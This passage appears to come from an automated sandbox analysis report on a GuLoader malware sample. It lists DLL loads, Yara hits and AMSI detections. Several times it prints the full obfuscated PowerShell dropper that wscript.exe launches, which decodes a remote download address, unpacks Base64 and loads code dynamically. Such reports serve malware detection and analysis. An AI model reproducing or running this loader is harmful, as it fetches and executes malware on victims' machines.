Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\SpcKwjkVCwDpYrmdMzPnPgIcKJhzsZQHVTLrlWHMTvkTbBlrMHxlStRLFthjpuRyVaBwYqNYhuzfR\kOAlByYcnQDKnTplLRjSHzGyPq.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2228792589.00000000082A5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: wab.exe, clip.exe
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2226049542.0000000007469000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000A.00000002.2226049542.00000000073D6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommand", "0")
Yara detected GuLoader
Source: Yara match File source: 0000000F.00000002.2467703895.0000000004F10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2231302976.000000000AFC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2230990264.0000000008710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2197404574.0000000005936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2815067045.000001A99C1F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fosser)$global:Delegeretmder = [System.Text.Encoding]::ASCII.GetString($Positionsangivelse)$global:Binres=$Delegeretmder.substring(284021,28471)<#Gazy Kjolekldte Auletai #>$Entreater
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Messed $Marikka $Bhmere), (Elskende @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Silkeforenes216 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Sta
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sammentmret)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Krekortets, $false).DefineType($Tanjib, $Gitt
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Fosser)$global:Delegeretmder = [System.Text.Encoding]::ASCII.GetString($Positionsangivelse)$global:Binres=$Delegeretmder.substring(284021,28471)<#Gazy Kjolekldte Auletai #>$Entreater
Suspicious powershell command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree NonvxTppe ';$Traditions='Nashira';biblioteksfilerne (Tyknende 'GregsSUnasseGrmmetPersi-HvalfCPieb.o Inv n CinntHerdsePrve nIndtetBrede Argum-RefitPPla taMbelptAfgrfhklar knivbTC,rva:morte\KonomGSlutkrS.igey S,agnBlahltPne,me stern SilkdTalene FejnsMes n.Fritit SubmxbismutCosmo Under-RhyptV Ext.a ,atol f,inuPublieKolla Nook $SkrivTRubler.orynaChancdZonaliGe.trtC.nidi NoncoKitnin Uds,sOrig ;Recep ');biblioteksfilerne (Tyknende ' Repai edelfBasqu Diff(HoppetStucce Sce,s ivsvtEpe.i-.odstpBarriaTyroltSysgth ang CalcaTPatro:Rigad\IsoclGUnordr Aggryamputn,hrootBordhe agttn myecdGui ee RevesFlere.Ps,udtPlastxPantet prun) Snot{D sene VindxleafsiKultutSonor} Sies;Limen ');$Kursusoversigten = Tyknende 'Servoe ontcN gashBi.looUnchi Preco%VagnuaKodiapPseu,pSe,igdAlt.baPeru.tInteraSpa.l%Stuve\DismeVcirc.aKerattFarvee SprarSleyspS.angaSha rsgutsesUnmeweYlvahnSundheAfspnsKsehu2Wiens4 Para.BesteAPatruc .llecmyone Resou&Parad&t.lip DiscueDurescBogtihLgel,okilot Re.ia$B sni ';biblioteksfilerne (Tyknende 'Blidh$KitnigToxollstrbsogeckobS,ffeaAristlTrans:tun,nTMephii.ammetDe uta.apitrSto.m= I.er(Modtac PresmIndevdAfhng Henst/tenebcOpt.i Im,r$Hord,K TrykuFje nr Skgls BeliusukkesNyoproKomm,vTelesePharmr AritsL mpnianligg rimot TweeeEmpirnDi.yo)Majus ');biblioteksfilerne (Tyknende 'citat$Comp.gEnd,sl TrygoAjlefbWeddea Br,dl Haa.:Hold FSlidsaRefuseL.ngtrAarvad Punki St rg,ross=Sk.iv$HandgDAlhusiGaulle DiaznFradr. OversStephp SheblservaigymnatAmtsv(Ouvri$AlpevLHospioD apen IdocgSe.ulrSustiu Griln Spar)ele h ');$Dien=$Faerdig[0];biblioteksfilerne (Tyknende ' Girl$ Un egA drolDredgoMortabOver,a B.ba Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Reglorified = 1;$Toupe='S';$Toupe+='ubstrin';$Toupe+='g';Function Tyknende($Frontotemporal){$Kommandodeles=$Frontotemporal.Length-$Reglorified;For($Nummerordens=5;$Nummerordens -lt $Kommandodeles;$Nummerordens+=6){$Crpe+=$Frontotemporal.$Toupe.Invoke( $Nummerordens, $Reglorified);}$Crpe;}function biblioteksfilerne($kedelcentralen){& ($Dataanlgs) ($kedelcentralen);}$Udskilles=Tyknende 'SnuggMfo.oro Loo zKa.aniStoo,lFlan lSmaaga len,/ U fi5H.gge.Mawse0 Xant Lint(Reae WPaikiiTorden StnidSk ftoM.gtswGrasssGivin Hovs.NAs.erTOutbr Kvot,1Goupi0Poess. ook0Recr,;Tilkn B.arWUnderiTorrinKalku6Rekor4Vandm; Oldt GodkexSlamb6Anvis4Overw;Rente TaalrRrgssvsvige:Ae,li1Synan2 Rupi1 ukat.,onra0Lo.ds)Apoth LouirGTempee OvercGenfokIso.co Syst/Menis2Ioevr0Stan.1Varsl0 sses0subst1 Coex0Un af1Raias IldneFDo,ediOvnhur,etere Luk,fAreahonobblx ara/ Ekvi1kha.e2Folk,1B.lls. Besk0Forme ';$Primevally=Tyknende '.rsteUHy,ossSquibe,parerRewar-TenanAFictigAffaee parn Jerrt Myrt ';$Dien=Tyknende 'SynsmhMilittVajedtDarenpS.eep:Dob,o/Perpl/Erase8Siren7Nonwe. jack1 ,ive2 Over1 Ar,g.Beret1Retst0Maler5Reded..ippe5Spare4Count/SculpOChapoxMec da D,pllBl eduSlippr imuli Cplma Indi2ret t0Libet9Thick.No,ensPostnmJo,dbi.onsu ';$Longrun=Tyknende 'Folke>Patte ';$Dataanlgs=Tyknende ' Verdi Unree 